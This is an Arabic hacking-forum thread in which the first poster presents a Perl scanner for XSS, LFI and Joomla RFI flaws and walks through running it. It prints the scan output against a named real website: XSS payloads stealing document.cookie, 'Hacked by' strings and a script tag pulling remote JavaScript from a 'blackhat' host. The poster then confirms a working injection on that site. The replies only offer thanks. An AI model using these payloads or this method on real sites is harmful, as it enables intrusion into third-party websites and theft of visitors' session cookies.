حالة الموضوع:
مغلق
  1. GO HacKer

    GO HacKer DeveloPer Plus

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    143
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18

    السلام عليكم ورحمه الله وبركاتة

    سكربت بيرل للبحث عن ثغرات

    XSS , LFI , Joomla RFI

    [Perl] BHG Multi Scanner [XSS , LFI , Joomla RFI] - Pastebin.com

    [ شرح مبسط ]

    ناخذ اكواد السكربت ونفتح تكست ونلصق الاكواد فيه ونحفضه ب صيغه pl
    مثال p.pl
    ونحفضه ف اي مكان ، عن نفسي حفضته في القرص C

    [​IMG]

    [ 1 ] هو الثغرات المراد البحث عنهاَ
    [ 2 ] نضع رقم الثغره ك مثال انا اخترت رقم 1 الي هي XSS
    [ 3 ] نضع الموقع المراد فحصه بدون القيمه او ب القيمه لا مانع
    ثم انتر :{w}:

    [​IMG]

    [ 4 ] وبعد انتهاء الفحص ، نحفظه ب صيغه txt
    ومرات ينحفظ تلقائياََ
    لكن لمن تواجهه مشكله في حفظ عمله البحث
    يعمل ك التالي
    كمثال في الصوره الثانيه : انا حفظته xxs2.txt

    C:/>xss2.txt
    المسار الي حفظنا فيه
    اسم المستند
    الصيغه

    ثم نتجه ل القرص C
    ينجد المستند ب اسم xss2
    او ب اسم All

    نفتح المستند

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58='><script>alert(document.cookie)</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58&lt;script&gt;alert('Hacked by TheShow youtube.com/theshowinglok');&lt;/script&gt   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58a?<script>alert('Hacked by TheShow youtube.com/theshowinglok')</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/Hacked by TheShow youtube.com/theshowinglok/alert(a.source)</SCRIPT>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58%3Cscript%3Ealert('Hacked by TheShow')%3C/script%3E   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert('Hacked by TheShow')>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>   =>   NOT FOUND XSS Vulnerability
    بعد ما نفتح المستند بنجد كلمتين في كل سطر

    XSS Vulnerability FOUND
    تم العثور على ثغره امنيه XSS

    NOT FOUND XSS Vulnerability
    لم يتم العثور على ثغرة أمنية XSS

    طيب ناخذ الرابط الي بعده كلمه XSS Vulnerability FOUND

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer> => XSS Vulnerability FOUND
    انصح ب استبدال

    كود PHP:
    <CeNTer>G3n3Rall</CeNTer>
    بـ !!:{

    كود PHP:
    "<>'<script>alert(0)</script>
    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58"<>'<script>alert(0)</script>
    مصاب وظهر لنا رساله التنبيه 1


    وفقنا الله وياكم لما يحب ويرضى :{11}:
     
  2. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    مشكور عزيزي ...استمر . )5:"
     
  3. القناص

    القناص DeveloPer Plus

    الأنتساب:
    ‏8 ديسمبر 2012
    المشاركات:
    89
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    العراق
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    بارك الله فيك يا غالي ..
     
  4. Mr.FriezA

    Mr.FriezA V • I • P

    الأنتساب:
    ‏10 مارس 2014
    المشاركات:
    552
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    18
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    الله يوفقك وشكرا على اﻻداه يابطل:rolleyes:
     
  5. [ بارود الهكر ]

    [ بارود الهكر ] Developer

    الأنتساب:
    ‏5 أكتوبر 2011
    المشاركات:
    43
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    بيت ابوي
    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    سلمت يمنيك والله رائع
    شكرا لك وبارك الله بك
    دومك مميز اخي
    تقبل تحيتي​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة